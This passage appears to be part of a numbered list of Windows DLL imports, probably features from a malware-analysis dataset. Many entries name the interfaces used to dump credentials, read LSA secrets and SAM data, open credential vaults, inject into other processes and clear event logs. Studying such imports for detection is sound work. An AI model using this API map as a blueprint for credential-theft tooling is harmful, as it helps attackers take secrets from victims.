  1765. "ole32.dll.CoRevokeInitializeSpy",
  1766. "ole32.dll.NdrOleInitializeExtension",
  1767. "ole32.dll.CoGetClassObject",
  1768. "ole32.dll.CoGetMarshalSizeMax",
  1769. "ole32.dll.CoMarshalInterface",
  1770. "ole32.dll.CoUnmarshalInterface",
  1771. "ole32.dll.CoGetPSClsid",
  1772. "ole32.dll.CoReleaseMarshalData",
  1773. "ole32.dll.DcomChannelSetHResult",
  1774. "advapi32.dll.UnregisterTraceGuids",
  1775. "comctl32.dll.#321",
  1776. "rpcrt4.dll.I_RpcSNCHOption",
  1777. "sechost.dll.ControlService",
  1778. "sechost.dll.StartServiceW",
  1779. "kernel32.dll.FlsAlloc",
  1780. "kernel32.dll.FlsGetValue",
  1781. "kernel32.dll.FlsSetValue",
  1782. "kernel32.dll.FlsFree",
  1783. "dbghelp.dll.SymFromAddr",
  1784. "dbghelp.dll.SymInitialize",
  1785. "wpcap.dll.pcap_close",
  1786. "wpcap.dll.pcap_datalink",
  1787. "wpcap.dll.pcap_dispatch",
  1788. "wpcap.dll.pcap_findalldevs",
  1789. "wpcap.dll.pcap_freealldevs",
  1790. "wpcap.dll.pcap_lib_version",
  1791. "wpcap.dll.pcap_lookupdev",
  1792. "wpcap.dll.pcap_major_version",
  1793. "wpcap.dll.pcap_minor_version",
  1794. "wpcap.dll.pcap_open_live",
  1795. "wpcap.dll.pcap_open_offline",
  1796. "wpcap.dll.pcap_sendpacket",
  1797. "wpcap.dll.pcap_next",
  1798. "wpcap.dll.pcap_setdirection",
  1799. "wpcap.dll.pcap_datalink_val_to_name",
  1800. "wpcap.dll.pcap_perror",
  1801. "wpcap.dll.pcap_sendqueue_alloc",
  1802. "wpcap.dll.pcap_sendqueue_transmit",
  1803. "wpcap.dll.pcap_sendqueue_destroy",
  1804. "wpcap.dll.pcap_sendqueue_queue",
  1805. "kernel32.dll.GetFullPathNameW",
  1806. "kernel32.dll.GetTimeFormatW",
  1807. "kernel32.dll.GetSystemTimeAsFileTime",
  1808. "kernel32.dll.SystemTimeToFileTime",
  1809. "kernel32.dll.GetDateFormatW",
  1810. "kernel32.dll.RtlVirtualUnwind",
  1811. "kernel32.dll.GetProcessId",
  1812. "kernel32.dll.PurgeComm",
  1813. "kernel32.dll.ClearCommError",
  1814. "kernel32.dll.CreateRemoteThread",
  1815. "kernel32.dll.CreateProcessW",
  1816. "kernel32.dll.SetConsoleOutputCP",
  1817. "kernel32.dll.GetConsoleOutputCP",
  1818. "kernel32.dll.CreateFileMappingW",
  1819. "kernel32.dll.UnmapViewOfFile",
  1820. "kernel32.dll.MapViewOfFile",
  1821. "kernel32.dll.WriteProcessMemory",
  1822. "kernel32.dll.VirtualAllocEx",
  1823. "kernel32.dll.VirtualProtectEx",
  1824. "kernel32.dll.ReadProcessMemory",
  1825. "kernel32.dll.VirtualFreeEx",
  1826. "kernel32.dll.VirtualQueryEx",
  1827. "kernel32.dll.VirtualQuery",
  1828. "kernel32.dll.GetComputerNameExW",
  1829. "kernel32.dll.DeviceIoControl",
  1830. "kernel32.dll.ExpandEnvironmentStringsW",
  1831. "kernel32.dll.FindNextFileW",
  1832. "kernel32.dll.GetCurrentDirectoryW",
  1833. "kernel32.dll.GetFileSizeEx",
  1834. "kernel32.dll.GetFileAttributesW",
  1835. "kernel32.dll.FindFirstFileW",
  1836. "kernel32.dll.GetFileInformationByHandle",
  1837. "kernel32.dll.GetCurrentDirectoryA",
  1838. "kernel32.dll.GetTempFileNameA",
  1839. "kernel32.dll.FileTimeToDosDateTime",
  1840. "kernel32.dll.CreateFileW",
  1841. "kernel32.dll.VirtualProtect",
  1842. "kernel32.dll.CreateMutexW",
  1843. "kernel32.dll.HeapCompact",
  1844. "kernel32.dll.TryEnterCriticalSection",
  1845. "kernel32.dll.QueryPerformanceCounter",
  1846. "kernel32.dll.FlushViewOfFile",
  1847. "kernel32.dll.WaitForSingleObjectEx",
  1848. "kernel32.dll.OutputDebugStringW",
  1849. "kernel32.dll.UnlockFileEx",
  1850. "kernel32.dll.FormatMessageA",
  1851. "kernel32.dll.FormatMessageW",
  1852. "kernel32.dll.GetVersionExW",
  1853. "kernel32.dll.HeapValidate",
  1854. "kernel32.dll.GetTempPathW",
  1855. "kernel32.dll.LockFileEx",
  1856. "kernel32.dll.GetDiskFreeSpaceW",
  1857. "kernel32.dll.CreateFileMappingA",
  1858. "kernel32.dll.GetDiskFreeSpaceA",
  1859. "kernel32.dll.GetFileAttributesExW",
  1860. "kernel32.dll.OutputDebugStringA",
  1861. "kernel32.dll.DeleteFileW",
  1862. "kernel32.dll.GetCurrentProcessId",
  1863. "kernel32.dll.AreFileApisANSI",
  1864. "kernel32.dll.SetConsoleCtrlHandler",
  1865. "kernel32.dll.SetConsoleTitleW",
  1866. "kernel32.dll.LoadLibraryW",
  1867. "kernel32.dll.GetModuleHandleW",
  1868. "kernel32.dll.SetHandleInformation",
  1869. "kernel32.dll.CreatePipe",
  1870. "kernel32.dll.CreateEventW",
  1871. "kernel32.dll.RtlLookupFunctionEntry",
  1872. "kernel32.dll.RtlCaptureContext",
  1873. "kernel32.dll.GetSystemDirectoryW",
  1874. "kernel32.dll.SetConsoleCursorPosition",
  1875. "kernel32.dll.FillConsoleOutputCharacterW",
  1876. "kernel32.dll.GetComputerNameW",
  1877. "kernel32.dll.ProcessIdToSessionId",
  1878. "kernel32.dll.SetCurrentDirectoryW",
  1879. "kernel32.dll.GetConsoleScreenBufferInfo",
  1880. "advapi32.dll.CryptSetHashParam",
  1881. "advapi32.dll.CryptExportKey",
  1882. "advapi32.dll.CryptAcquireContextW",
  1883. "advapi32.dll.CryptSetKeyParam",
  1884. "advapi32.dll.CryptGetKeyParam",
  1885. "advapi32.dll.CryptDuplicateKey",
  1886. "advapi32.dll.CryptGetProvParam",
  1887. "advapi32.dll.CryptImportKey",
  1888. "advapi32.dll.SystemFunction007",
  1889. "advapi32.dll.CryptEncrypt",
  1890. "advapi32.dll.CryptGenKey",
  1891. "advapi32.dll.CryptDestroyKey",
  1892. "advapi32.dll.CryptDecrypt",
  1893. "advapi32.dll.CopySid",
  1894. "advapi32.dll.GetLengthSid",
  1895. "advapi32.dll.LsaQueryInformationPolicy",
  1896. "advapi32.dll.LsaOpenPolicy",
  1897. "advapi32.dll.LsaClose",
  1898. "advapi32.dll.CreateWellKnownSid",
  1899. "advapi32.dll.CreateProcessWithLogonW",
  1900. "advapi32.dll.CreateProcessAsUserW",
  1901. "advapi32.dll.RegQueryValueExW",
  1902. "advapi32.dll.RegEnumValueW",
  1903. "advapi32.dll.RegSetValueExW",
  1904. "advapi32.dll.SystemFunction032",
  1905. "advapi32.dll.ConvertSidToStringSidW",
  1906. "advapi32.dll.CreateServiceW",
  1907. "advapi32.dll.OpenSCManagerW",
  1908. "advapi32.dll.SetServiceObjectSecurity",
  1909. "advapi32.dll.OpenServiceW",
  1910. "advapi32.dll.BuildSecurityDescriptorW",
  1911. "advapi32.dll.QueryServiceObjectSecurity",
  1912. "advapi32.dll.StartServiceW",
  1913. "advapi32.dll.AllocateAndInitializeSid",
  1914. "advapi32.dll.QueryServiceStatusEx",
  1915. "advapi32.dll.FreeSid",
  1916. "advapi32.dll.ControlService",
  1917. "advapi32.dll.IsTextUnicode",
  1918. "advapi32.dll.OpenProcessToken",
  1919. "advapi32.dll.GetTokenInformation",
  1920. "advapi32.dll.LookupAccountNameW",
  1921. "advapi32.dll.DuplicateTokenEx",
  1922. "advapi32.dll.CheckTokenMembership",
  1923. "advapi32.dll.CryptEnumProvidersW",
  1924. "advapi32.dll.ConvertStringSidToSidW",
  1925. "advapi32.dll.LsaFreeMemory",
  1926. "advapi32.dll.SetThreadToken",
  1927. "advapi32.dll.CryptSetProvParam",
  1928. "advapi32.dll.CryptEnumProviderTypesW",
  1929. "advapi32.dll.SystemFunction006",
  1930. "advapi32.dll.CryptGetUserKey",
  1931. "advapi32.dll.OpenEventLogW",
  1932. "advapi32.dll.GetNumberOfEventLogRecords",
  1933. "advapi32.dll.ClearEventLogW",
  1934. "advapi32.dll.SystemFunction001",
  1935. "advapi32.dll.CryptDeriveKey",
  1936. "advapi32.dll.SystemFunction005",
  1937. "advapi32.dll.LsaQueryTrustedDomainInfoByName",
  1938. "advapi32.dll.CryptSignHashW",
  1939. "advapi32.dll.LsaOpenSecret",
  1940. "advapi32.dll.LsaQuerySecret",
  1941. "advapi32.dll.SystemFunction013",
  1942. "advapi32.dll.LsaRetrievePrivateData",
  1943. "advapi32.dll.LsaEnumerateTrustedDomainsEx",
  1944. "advapi32.dll.LookupPrivilegeValueW",
  1945. "advapi32.dll.StartServiceCtrlDispatcherW",
  1946. "advapi32.dll.RegisterServiceCtrlHandlerW",
  1947. "advapi32.dll.IsValidSid",
  1948. "advapi32.dll.LookupPrivilegeNameW",
  1949. "advapi32.dll.OpenThreadToken",
  1950. "advapi32.dll.CredFree",
  1951. "advapi32.dll.CredEnumerateW",
  1952. "advapi32.dll.GetSidSubAuthority",
  1953. "advapi32.dll.GetSidSubAuthorityCount",
  1954. "advapi32.dll.SystemFunction025",
  1955. "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
  1956. "advapi32.dll.SystemFunction024",
  1957. "advapi32.dll.A_SHAFinal",
  1958. "advapi32.dll.A_SHAInit",
  1959. "advapi32.dll.A_SHAUpdate",
  1960. "cabinet.dll.#11",
  1961. "cabinet.dll.#14",
  1962. "cabinet.dll.#10",
  1963. "cabinet.dll.#13",
  1964. "crypt32.dll.CertGetNameStringW",
  1965. "crypt32.dll.CryptEncodeObject",
  1966. "crypt32.dll.CertEnumSystemStore",
  1967. "crypt32.dll.CryptSignAndEncodeCertificate",
  1968. "crypt32.dll.CertEnumCertificatesInStore",
  1969. "crypt32.dll.CertAddEncodedCertificateToStore",
  1970. "crypt32.dll.CertOpenStore",
  1971. "crypt32.dll.CertFreeCertificateContext",
  1972. "crypt32.dll.CertCloseStore",
  1973. "crypt32.dll.CertSetCertificateContextProperty",
  1974. "crypt32.dll.PFXExportCertStoreEx",
  1975. "crypt32.dll.CryptUnprotectData",
  1976. "crypt32.dll.CryptBinaryToStringW",
  1977. "crypt32.dll.CryptStringToBinaryW",
  1978. "crypt32.dll.CryptProtectData",
  1979. "crypt32.dll.CryptExportPublicKeyInfo",
  1980. "crypt32.dll.CryptAcquireCertificatePrivateKey",
  1981. "crypt32.dll.CertNameToStrW",
  1982. "crypt32.dll.CertGetCertificateContextProperty",
  1983. "crypt32.dll.CertAddCertificateContextToStore",
  1984. "crypt32.dll.CertFindCertificateInStore",
  1985. "cryptdll.dll.CDLocateCSystem",
  1986. "cryptdll.dll.MD5Final",
  1987. "cryptdll.dll.MD5Init",
  1988. "cryptdll.dll.CDLocateCheckSum",
  1989. "cryptdll.dll.CDGenerateRandomBits",
  1990. "cryptdll.dll.MD5Update",
  1991. "fltlib.dll.FilterFindFirst",
  1992. "fltlib.dll.FilterFindNext",
  1993. "hid.dll.HidD_GetPreparsedData",
  1994. "hid.dll.HidD_FreePreparsedData",
  1995. "hid.dll.HidP_GetCaps",
  1996. "hid.dll.HidD_GetFeature",
  1997. "hid.dll.HidD_GetAttributes",
  1998. "hid.dll.HidD_GetHidGuid",
  1999. "hid.dll.HidD_SetFeature",
  2000. "msasn1.dll.ASN1_CreateModule",
  2001. "msasn1.dll.ASN1_CloseEncoder",
  2002. "msasn1.dll.ASN1_CreateDecoder",
  2003. "msasn1.dll.ASN1_FreeEncoded",
  2004. "msasn1.dll.ASN1_CloseModule",
  2005. "msasn1.dll.ASN1_CreateEncoder",
  2006. "msasn1.dll.ASN1_CloseDecoder",
  2007. "msasn1.dll.ASN1BERDotVal2Eoid",
  2008. "msvcrt.dll.isdigit",
  2009. "msvcrt.dll.isspace",
  2010. "msvcrt.dll.__set_app_type",
  2011. "msvcrt.dll.mbtowc",
  2012. "msvcrt.dll.__mb_cur_max",
  2013. "msvcrt.dll.isleadbyte",
  2014. "msvcrt.dll.isxdigit",
  2015. "msvcrt.dll.localeconv",
  2016. "msvcrt.dll._snprintf",
  2017. "msvcrt.dll._itoa",
  2018. "msvcrt.dll.calloc",
  2019. "msvcrt.dll.wctomb",
  2020. "msvcrt.dll.ferror",
  2021. "msvcrt.dll.iswctype",
  2022. "msvcrt.dll.wcstombs",
  2023. "msvcrt.dll.?terminate@@YAXXZ",
  2024. "msvcrt.dll.__badioinfo",
  2025. "msvcrt.dll.__pioinfo",
  2026. "msvcrt.dll._read",
  2027. "msvcrt.dll._lseeki64",
  2028. "msvcrt.dll._write",
  2029. "msvcrt.dll._isatty",
  2030. "msvcrt.dll.ungetc",
  2031. "msvcrt.dll._fmode",
  2032. "msvcrt.dll.getchar",
  2033. "msvcrt.dll._wpgmptr",
  2034. "msvcrt.dll._commode",
  2035. "msvcrt.dll.__setusermatherr",
  2036. "msvcrt.dll._amsg_exit",
  2037. "msvcrt.dll._initterm",
  2038. "msvcrt.dll.exit",
  2039. "msvcrt.dll._cexit",
  2040. "msvcrt.dll._exit",
  2041. "msvcrt.dll._XcptFilter",
  2042. "msvcrt.dll.__wgetmainargs",
  2043. "msvcrt.dll.__C_specific_handler",
  2044. "msvcrt.dll.fgetws",
  2045. "msvcrt.dll.memset",
  2046. "msvcrt.dll.memcpy",
  2047. "msvcrt.dll._errno",
  2048. "msvcrt.dll.free",
  2049. "msvcrt.dll._wcsdup",
  2050. "msvcrt.dll.vfwprintf",
  2051. "msvcrt.dll.fflush",
  2052. "msvcrt.dll._wfopen",
  2053. "msvcrt.dll.wprintf",
  2054. "msvcrt.dll._fileno",
  2055. "msvcrt.dll._iob",
  2056. "msvcrt.dll.vwprintf",
  2057. "msvcrt.dll._setmode",
  2058. "msvcrt.dll.fclose",
  2059. "msvcrt.dll.gmtime",
  2060. "msvcrt.dll.malloc",
  2061. "msvcrt.dll._msize",
  2062. "msvcrt.dll.strftime",
  2063. "msvcrt.dll.realloc",
  2064. "netapi32.dll.NetServerGetInfo",
  2065. "netapi32.dll.NetStatisticsGet",
  2066. "netapi32.dll.NetShareEnum",
  2067. "netapi32.dll.NetSessionEnum",
  2068. "netapi32.dll.DsGetDcNameW",
  2069. "netapi32.dll.NetApiBufferFree",
  2070. "netapi32.dll.NetRemoteTOD",
  2071. "netapi32.dll.NetWkstaUserEnum",
  2072. "netapi32.dll.I_NetServerTrustPasswordsGet",
  2073. "netapi32.dll.I_NetServerReqChallenge",
  2074. "netapi32.dll.I_NetServerAuthenticate2",
  2075. "ntdll.dll.wcsncmp",
  2076. "ntdll.dll._wcstoui64",
  2077. "ntdll.dll.wcstol",
  2078. "ntdll.dll.wcstoul",
  2079. "ntdll.dll.memmove",
  2080. "ntdll.dll.wcsstr",
  2081. "ntdll.dll._wcsnicmp",
  2082. "ntdll.dll.strtoul",
  2083. "ntdll.dll.wcschr",
  2084. "ntdll.dll.wcsrchr",
  2085. "ntdll.dll._stricmp",
  2086. "ntdll.dll._vscwprintf",
  2087. "ntdll.dll._wcsicmp",
  2088. "ntdll.dll.strrchr",
  2089. "ntdll.dll._vsnprintf",
  2090. "ntdll.dll.memcmp",
  2091. "ntdll.dll.RtlUnicodeStringToAnsiString",
  2092. "ntdll.dll.RtlFreeAnsiString",
  2093. "ntdll.dll.RtlDowncaseUnicodeString",
  2094. "ntdll.dll.RtlFreeUnicodeString",
  2095. "ntdll.dll.RtlInitUnicodeString",
  2096. "ntdll.dll.RtlEqualUnicodeString",
  2097. "ntdll.dll.NtQueryObject",
  2098. "ntdll.dll.RtlCompressBuffer",
  2099. "ntdll.dll.RtlGetCompressionWorkSpaceSize",
  2100. "ntdll.dll.NtQuerySystemInformation",
  2101. "ntdll.dll.RtlGetCurrentPeb",
  2102. "ntdll.dll.NtQueryInformationProcess",
  2103. "ntdll.dll.RtlCreateUserThread",
  2104. "ntdll.dll.RtlGUIDFromString",
  2105. "ntdll.dll.RtlStringFromGUID",
  2106. "ntdll.dll.NtCompareTokens",
  2107. "ntdll.dll.RtlGetNtVersionNumbers",
  2108. "ntdll.dll.RtlEqualString",
  2109. "ntdll.dll.RtlUpcaseUnicodeString",
  2110. "ntdll.dll.RtlAppendUnicodeStringToString",
  2111. "ntdll.dll.RtlAnsiStringToUnicodeString",
  2112. "ntdll.dll.RtlFreeOemString",
  2113. "ntdll.dll.RtlUpcaseUnicodeStringToOemString",
  2114. "ntdll.dll.NtResumeProcess",
  2115. "ntdll.dll.NtSuspendProcess",
  2116. "ntdll.dll.NtTerminateProcess",
  2117. "ntdll.dll.NtQuerySystemEnvironmentValueEx",
  2118. "ntdll.dll.NtSetSystemEnvironmentValueEx",
  2119. "ntdll.dll.NtEnumerateSystemEnvironmentValuesEx",
  2120. "ntdll.dll.RtlIpv4AddressToStringW",
  2121. "ntdll.dll.RtlIpv6AddressToStringW",
  2122. "ntdll.dll.towupper",
  2123. "ntdll.dll.__chkstk",
  2124. "rpcrt4.dll.RpcMgmtEpEltInqNextW",
  2125. "rpcrt4.dll.RpcMgmtEpEltInqBegin",
  2126. "rpcrt4.dll.I_RpcGetCurrentCallHandle",
  2127. "rpcrt4.dll.NdrClientCall2",
  2128. "rpcrt4.dll.RpcMgmtEpEltInqDone",
  2129. "rpcrt4.dll.RpcBindingFromStringBindingW",
  2130. "rpcrt4.dll.RpcStringBindingComposeW",
  2131. "rpcrt4.dll.MesEncodeIncrementalHandleCreate",
  2132. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  2133. "rpcrt4.dll.RpcBindingInqAuthClientW",
  2134. "rpcrt4.dll.RpcBindingSetOption",
  2135. "rpcrt4.dll.RpcImpersonateClient",
  2136. "rpcrt4.dll.RpcStringFreeW",
  2137. "rpcrt4.dll.RpcRevertToSelf",
  2138. "rpcrt4.dll.MesDecodeIncrementalHandleCreate",
  2139. "rpcrt4.dll.MesHandleFree",
  2140. "rpcrt4.dll.MesIncrementalHandleReset",
  2141. "rpcrt4.dll.NdrMesTypeDecode2",
  2142. "rpcrt4.dll.NdrMesTypeAlignSize2",
  2143. "rpcrt4.dll.NdrMesTypeFree2",
  2144. "rpcrt4.dll.NdrMesTypeEncode2",
  2145. "rpcrt4.dll.RpcServerUnregisterIfEx",
  2146. "rpcrt4.dll.I_RpcBindingInqSecurityContext",
  2147. "rpcrt4.dll.RpcServerInqBindings",
  2148. "rpcrt4.dll.RpcServerListen",
  2149. "rpcrt4.dll.RpcMgmtWaitServerListen",
  2150. "rpcrt4.dll.RpcEpRegisterW",
  2151. "rpcrt4.dll.RpcMgmtStopServerListening",
  2152. "rpcrt4.dll.RpcBindingToStringBindingW",
  2153. "rpcrt4.dll.RpcServerRegisterIf2",
  2154. "rpcrt4.dll.RpcServerRegisterAuthInfoW",
  2155. "rpcrt4.dll.RpcBindingVectorFree",
  2156. "rpcrt4.dll.UuidToStringW",
  2157. "rpcrt4.dll.RpcServerUseProtseqEpW",
  2158. "rpcrt4.dll.RpcEpUnregister",
  2159. "rpcrt4.dll.NdrServerCall2",
  2160. "rpcrt4.dll.RpcEpResolveBinding",
  2161. "rpcrt4.dll.UuidCreate",
  2162. "samlib.dll.SamGetGroupsForUser",
  2163. "samlib.dll.SamEnumerateGroupsInDomain",
  2164. "samlib.dll.SamiChangePasswordUser",
  2165. "samlib.dll.SamGetMembersInGroup",
  2166. "samlib.dll.SamSetInformationUser",
  2167. "samlib.dll.SamRidToSid",
  2168. "samlib.dll.SamGetMembersInAlias",
  2169. "samlib.dll.SamEnumerateAliasesInDomain",
  2170. "samlib.dll.SamGetAliasMembership",
  2171. "samlib.dll.SamOpenGroup",
  2172. "samlib.dll.SamOpenAlias",
  2173. "samlib.dll.SamQueryInformationUser",
  2174. "samlib.dll.SamCloseHandle",
  2175. "samlib.dll.SamEnumerateDomainsInSamServer",
  2176. "samlib.dll.SamFreeMemory",
  2177. "samlib.dll.SamEnumerateUsersInDomain",
  2178. "samlib.dll.SamOpenUser",
  2179. "samlib.dll.SamLookupDomainInSamServer",
  2180. "samlib.dll.SamLookupNamesInDomain",
  2181. "samlib.dll.SamLookupIdsInDomain",
  2182. "samlib.dll.SamOpenDomain",
  2183. "samlib.dll.SamConnect",
  2184. "secur32.dll.FreeContextBuffer",
  2185. "secur32.dll.LsaLookupAuthenticationPackage",
  2186. "secur32.dll.LsaConnectUntrusted",
  2187. "secur32.dll.LsaFreeReturnBuffer",
  2188. "secur32.dll.LsaDeregisterLogonProcess",
  2189. "secur32.dll.DeleteSecurityContext",
  2190. "secur32.dll.LsaCallAuthenticationPackage",
  2191. "secur32.dll.FreeCredentialsHandle",
  2192. "secur32.dll.AcquireCredentialsHandleW",
  2193. "secur32.dll.InitializeSecurityContextW",
  2194. "secur32.dll.QueryContextAttributesW",
  2195. "secur32.dll.EnumerateSecurityPackagesW",
  2196. "setupapi.dll.SetupDiGetDeviceInterfaceDetailW",
  2197. "setupapi.dll.SetupDiEnumDeviceInterfaces",
  2198. "setupapi.dll.SetupDiGetClassDevsW",
  2199. "setupapi.dll.SetupDiDestroyDeviceInfoList",
  2200. "shell32.dll.CommandLineToArgvW",
  2201. "shlwapi.dll.PathIsDirectoryW",
  2202. "shlwapi.dll.PathCanonicalizeW",
  2203. "shlwapi.dll.PathCombineW",
  2204. "shlwapi.dll.PathFindFileNameW",
  2205. "shlwapi.dll.PathIsRelativeW",
  2206. "user32.dll.IsCharAlphaNumericW",
  2207. "user32.dll.GetKeyboardLayout",
  2208. "user32.dll.DispatchMessageW",
  2209. "user32.dll.DefWindowProcW",
  2210. "user32.dll.SetClipboardViewer",
  2211. "user32.dll.SendMessageW",
  2212. "user32.dll.GetClipboardSequenceNumber",
  2213. "user32.dll.CreateWindowExW",
  2214. "user32.dll.ChangeClipboardChain",
  2215. "user32.dll.RegisterClassExW",
  2216. "user32.dll.EnumClipboardFormats",
  2217. "user32.dll.PostMessageW",
  2218. "user32.dll.UnregisterClassW",
  2219. "user32.dll.GetMessageW",
  2220. "userenv.dll.CreateEnvironmentBlock",
  2221. "userenv.dll.DestroyEnvironmentBlock",
  2222. "version.dll.GetFileVersionInfoSizeW",
  2223. "version.dll.VerQueryValueW",
  2224. "version.dll.GetFileVersionInfoW",
  2225. "winscard.dll.SCardFreeMemory",
  2226. "winscard.dll.SCardListCardsW",
  2227. "winscard.dll.SCardControl",
  2228. "winscard.dll.SCardGetCardTypeProviderNameW",
  2229. "winscard.dll.SCardReleaseContext",
  2230. "winscard.dll.SCardListReadersW",
  2231. "winscard.dll.SCardEstablishContext",
  2232. "winscard.dll.SCardConnectW",
  2233. "winscard.dll.SCardTransmit",
  2234. "winscard.dll.SCardDisconnect",
  2235. "winscard.dll.SCardGetAttrib",
  2236. "winsta.dll.WinStationCloseServer",
  2237. "winsta.dll.WinStationOpenServerW",
  2238. "winsta.dll.WinStationFreeMemory",
  2239. "winsta.dll.WinStationConnectW",
  2240. "winsta.dll.WinStationQueryInformationW",
  2241. "winsta.dll.WinStationEnumerateW",
  2242. "wldap32.dll.#140",
  2243. "wldap32.dll.#122",
  2244. "wldap32.dll.#14",
  2245. "wldap32.dll.#88",
  2246. "wldap32.dll.#133",
  2247. "wldap32.dll.#142",
  2248. "wldap32.dll.#77",
  2249. "wldap32.dll.#27",
  2250. "wldap32.dll.#13",
  2251. "wldap32.dll.#147",
  2252. "wldap32.dll.#96",
  2253. "wldap32.dll.#208",
  2254. "wldap32.dll.#224",
  2255. "wldap32.dll.#36",
  2256. "wldap32.dll.#79",
  2257. "wldap32.dll.#157",
  2258. "wldap32.dll.#26",
  2259. "wldap32.dll.#41",
  2260. "wldap32.dll.#127",
  2261. "wldap32.dll.#73",
  2262. "wldap32.dll.#301",
  2263. "wldap32.dll.#304",
  2264. "wldap32.dll.#309",
  2265. "wldap32.dll.#54",
  2266. "wldap32.dll.#310",
  2267. "wldap32.dll.#69",
  2268. "wldap32.dll.#139",
  2269. "wldap32.dll.#97",
  2270. "wldap32.dll.#223",
  2271. "wldap32.dll.#12",
  2272. "wldap32.dll.#145",
  2273. "wldap32.dll.#113",
  2274. "wldap32.dll.#167",
  2275. "wldap32.dll.#203",
  2276. "rsaenh.dll.CPExportKey",
  2277. "vaultcli.dll.VaultEnumerateItemTypes",
  2278. "vaultcli.dll.VaultEnumerateVaults",
  2279. "vaultcli.dll.VaultOpenVault",
  2280. "vaultcli.dll.VaultGetInformation",
  2281. "vaultcli.dll.VaultEnumerateItems",
  2282. "vaultcli.dll.VaultCloseVault",
  2283. "vaultcli.dll.VaultFree",
  2284. "vaultcli.dll.VaultGetItem",
  2285. "wintrust.dll.WinVerifyTrust",
  2286. "bcrypt.dll.BCryptOpenAlgorithmProvider",
  2287. "bcrypt.dll.BCryptSetProperty",
  2288. "bcrypt.dll.BCryptGetProperty",
  2289. "bcrypt.dll.BCryptGenerateSymmetricKey",
  2290. "bcrypt.dll.BCryptDecrypt",
  2291. "cryptsp.dll.CryptImportKey",
  2292. "cryptsp.dll.CryptSetHashParam",
  2293. "cryptsp.dll.CryptDestroyKey",
  2294. "bcrypt.dll.BCryptCloseAlgorithmProvider",
  2295. "bcrypt.dll.BCryptDestroyKey",
  2296. "sspicli.dll.GetUserNameExW",
  2297. "advapi32.dll.GetUserNameW",
  2298. "sechost.dll.ConvertSidToStringSidW",
  2299. "xmllite.dll.CreateXmlWriter",
  2300. "xmllite.dll.CreateXmlWriterOutputWithEncodingName",
  2301. "sechost.dll.ChangeServiceConfigW",
  2302. "kernel32.dll.GetThreadContext",
  2303. "kernel32.dll.OpenThread",
  2304. "kernel32.dll.DebugActiveProcess",
  2305. "kernel32.dll.DebugActiveProcessStop",
  2306. "kernel32.dll.ContinueDebugEvent",
  2307. "kernel32.dll.WaitForDebugEvent",
  2308. "kernel32.dll.SystemTimeToTzSpecificLocalTime",
  2309. "kernel32.dll.Process32FirstW",
  2310. "kernel32.dll.Process32NextW",
  2311. "kernel32.dll.DebugBreak",
  2312. "kernel32.dll.SetFilePointerEx",
  2313. "kernel32.dll.CreateSemaphoreW",
  2314. "kernel32.dll.GetConsoleCP",
  2315. "kernel32.dll.LoadLibraryExW",
  2316. "kernel32.dll.GetStartupInfoW",
  2317. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
  2318. "kernel32.dll.GetModuleFileNameW",
  2319. "kernel32.dll.GetCommandLineW",
  2320. "kernel32.dll.WriteConsoleW",
  2321. "kernel32.dll.ReadConsoleW",
  2322. "kernel32.dll.IsValidCodePage",
  2323. "kernel32.dll.GetConsoleMode",
  2324. "kernel32.dll.ReadConsoleInputA",
  2325. "kernel32.dll.SetConsoleMode",
  2326. "kernel32.dll.GetModuleHandleExW",
  2327. "kernel32.dll.RtlPcToFileHeader",
  2328. "kernel32.dll.RtlUnwindEx",
  2329. "advapi32.dll.EnumServicesStatusExW",
  2330. "advapi32.dll.AdjustTokenPrivileges",
  2331. "advapi32.dll.RegDeleteValueW",
  2332. "advapi32.dll.RegDeleteKeyW",
  2333. "advapi32.dll.RegCreateKeyW",
  2334. "comdlg32.dll.PrintDlgW",
  2335. "gdi32.dll.StartDocW",
  2336. "ole32.dll.CoAllowSetForegroundWindow",
  2337. "pdh.dll.PdhOpenQueryW",
  2338. "pdh.dll.PdhAddCounterW",
  2339. "pdh.dll.PdhCollectQueryData",
  2340. "pdh.dll.PdhGetFormattedCounterValue",
  2341. "psapi.dll.EnumProcessModules",
  2342. "psapi.dll.GetProcessImageFileNameW",
  2343. "psapi.dll.GetModuleBaseNameW",
  2344. "user32.dll.SetWindowTextW",
  2345. "user32.dll.wsprintfW",
  2346. "user32.dll.IsHungAppWindow",
  2347. "user32.dll.EnumWindows",
  2348. "user32.dll.DialogBoxIndirectParamW",
  2349. "user32.dll.LoadCursorW",
  2350. "kernel32.dll.InitializeCriticalSectionEx",
  2351. "kernel32.dll.CreateEventExW",
  2352. "kernel32.dll.CreateSemaphoreExW",
  2353. "kernel32.dll.SetThreadStackGuarantee",
  2354. "kernel32.dll.CreateThreadpoolTimer",
  2355. "kernel32.dll.SetThreadpoolTimer",
  2356. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
  2357. "kernel32.dll.CloseThreadpoolTimer",
  2358. "kernel32.dll.CreateThreadpoolWait",
  2359. "kernel32.dll.SetThreadpoolWait",
  2360. "kernel32.dll.CloseThreadpoolWait",
  2361. "kernel32.dll.FlushProcessWriteBuffers",
  2362. "kernel32.dll.FreeLibraryWhenCallbackReturns",
  2363. "kernel32.dll.GetCurrentProcessorNumber",
  2364. "kernel32.dll.GetLogicalProcessorInformation",
  2365. "kernel32.dll.CreateSymbolicLinkW",
  2366. "kernel32.dll.EnumSystemLocalesEx",
  2367. "kernel32.dll.CompareStringEx",
  2368. "kernel32.dll.GetDateFormatEx",
  2369. "kernel32.dll.GetLocaleInfoEx",
  2370. "kernel32.dll.GetTimeFormatEx",
  2371. "kernel32.dll.GetUserDefaultLocaleName",
  2372. "kernel32.dll.IsValidLocaleName",
  2373. "kernel32.dll.LCMapStringEx",
  2374. "kernel32.dll.GetTickCount64",
  2375. "dbghelp.dll.MiniDumpWriteDump",
  2376. "dbghelp.dll.ImagehlpApiVersion",
  2377. "dbghelp.dll.EnumerateLoadedModulesEx",
  2378. "ntdll.dll.RtlCreateProcessReflection",
  2379. "ntdll.dll.RtlGetLastNtStatus",
  2380. "kernel32.dll.K32GetModuleFileNameExW",
  2381. "kernel32.dll.Thread32First",
  2382. "kernel32.dll.Thread32Next",
  2383. "kernel32.dll.Module32First",
  2384. "kernel32.dll.Module32Next",
  2385. "kernel32.dll.Module32FirstW",
  2386. "kernel32.dll.Module32NextW",
  2387. "kernel32.dll.GetLongPathNameA",
  2388. "kernel32.dll.GetLongPathNameW",
  2389. "kernel32.dll.GetProcessTimes",
  2390. "ntdll.dll.NtOpenThread",
